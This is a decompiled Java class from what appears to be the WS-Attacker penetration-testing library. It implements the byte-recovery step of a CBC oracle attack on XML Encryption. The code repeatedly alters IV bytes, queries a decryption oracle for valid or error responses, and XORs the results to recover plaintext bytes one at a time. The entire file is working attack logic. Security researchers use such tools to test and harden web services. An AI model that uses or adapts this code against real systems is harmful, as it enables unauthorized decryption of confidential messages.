/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc;

import java.util.LinkedList;
import wsattacker.library.xmlencryptionattack.attackengine.CryptoAttackException;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.Method;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.NoColumnFoundException;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.AOracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.CBCOracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;

public class FindByteMethod
extends Method {
    private static final int FIRST_COLUMN = 1;
    private static final int SECOND_COLUMN = 2;
    private LinkedList<Byte> errorBytes;
    private LinkedList<Byte> correctBytes;

    public FindByteMethod(AOracle oracle, byte[] iv, byte[] c1) {
        super(oracle, iv, c1);
    }

    public byte executeAttack(int i) throws NoColumnFoundException {
        byte plainTextByte;
        this.errorBytes = new LinkedList();
        this.correctBytes = new LinkedList();
        byte originalByte = this.iv[i];
        int column = this.findColumn(this.iv, this.c1, i);
        if (column == 1) {
            boolean searchedForAllBytes = false;
            if (this.correctBytes.isEmpty()) {
                searchedForAllBytes = this.findCorrectByteInFirstColumn(i);
            }
            byte byteCausingEvent = this.identifyCorrectByteInFirstColumn(i, searchedForAllBytes);
            plainTextByte = (byte)(byteCausingEvent ^ originalByte ^ this.correctBytes.get(0));
        } else {
            byte byteCausingEvent = this.identifyErrorByteInSecondColumn(i);
            plainTextByte = (byte)(byteCausingEvent ^ originalByte ^ this.errorBytes.get(0));
        }
        this.iv[i] = originalByte;
        return plainTextByte;
    }

    private int findColumn(byte[] iv, byte[] c1, int i) throws NoColumnFoundException {
        int firstBit = iv[i] & 0x80;
        for (int j = 0; j < 4; ++j) {
            for (int k = 0; k < 2; ++k) {
                int column = firstBit | j << 5 | k << 4;
                iv[i] = (byte)column;
                CBCOracleRequest req = new CBCOracleRequest(iv, c1);
                OracleResponse resp = this.m_Oracle.queryOracle(req);
                if (resp.getResult() == OracleResponse.Result.VALID) {
                    this.correctBytes.add(iv[i]);
                    continue;
                }
                this.errorBytes.add(iv[i]);
            }
            if (!this.errorBytes.isEmpty()) {
                if (this.correctBytes.isEmpty()) {
                    return 1;
                }
                iv[i] = (byte)(this.errorBytes.get(0) + 2);
                CBCOracleRequest req = new CBCOracleRequest(iv, c1);
                OracleResponse resp = this.m_Oracle.queryOracle(req);
                if (resp.getResult() == OracleResponse.Result.VALID) {
                    this.correctBytes.add(iv[i]);
                    return 2;
                }
                this.errorBytes.add(iv[i]);
                return 1;
            }
            this.correctBytes.clear();
        }
        throw new NoColumnFoundException(i);
    }

    private boolean findCorrectByteInFirstColumn(int i) {
        int testedByte = this.errorBytes.get(0) + 2;
        for (int j = 0; j < 15; ++j) {
            if (!this.correctBytes.contains((byte)testedByte)) {
                this.iv[i] = (byte)testedByte;
                CBCOracleRequest req = new CBCOracleRequest(this.iv, this.c1);
                OracleResponse resp = this.m_Oracle.queryOracle(req);
                if (resp.getResult() == OracleResponse.Result.VALID) {
                    this.correctBytes.add((byte)testedByte);
                    if (j < 14) {
                        return false;
                    }
                }
            }
            testedByte += 2;
        }
        return true;
    }

    private byte identifyCorrectByteInFirstColumn(int i, boolean searchedForAllBytes) throws NoColumnFoundException {
        if (searchedForAllBytes) {
            if (this.correctBytes.size() == 1) {
                return 10;
            }
            if (this.correctBytes.size() > 1) {
                this.iv[i] = (byte)(this.correctBytes.get(0) ^ 0x2F);
                CBCOracleRequest req = new CBCOracleRequest(this.iv, this.c1);
                OracleResponse resp = this.m_Oracle.queryOracle(req);
                if (resp.getResult() == OracleResponse.Result.VALID) {
                    return 13;
                }
                return 9;
            }
            throw new NoColumnFoundException("The column for this byte was not found properly. This byte (" + i + ") should probably be padded");
        }
        this.iv[i] = (byte)(this.correctBytes.get(0) ^ 0x2F);
        CBCOracleRequest req = new CBCOracleRequest(this.iv, this.c1);
        OracleResponse resp = this.m_Oracle.queryOracle(req);
        if (resp.getResult() == OracleResponse.Result.VALID) {
            this.iv[i] = (byte)(this.correctBytes.get(0) ^ 0x2C);
            req = new CBCOracleRequest(this.iv, this.c1);
            resp = this.m_Oracle.queryOracle(req);
            if (resp.getResult() == OracleResponse.Result.VALID) {
                return 13;
            }
            return 10;
        }
        return 9;
    }

    private byte identifyErrorByteInSecondColumn(int i) {
        this.iv[i] = (byte)(this.errorBytes.get(0) ^ 0x2B);
        CBCOracleRequest req = new CBCOracleRequest(this.iv, this.c1);
        OracleResponse resp = this.m_Oracle.queryOracle(req);
        if (resp.getResult() == OracleResponse.Result.VALID) {
            return 38;
        }
        return 60;
    }

    @Override
    public byte[] executeAttack() throws CryptoAttackException {
        throw new UnsupportedOperationException("Not supported yet.");
    }
}

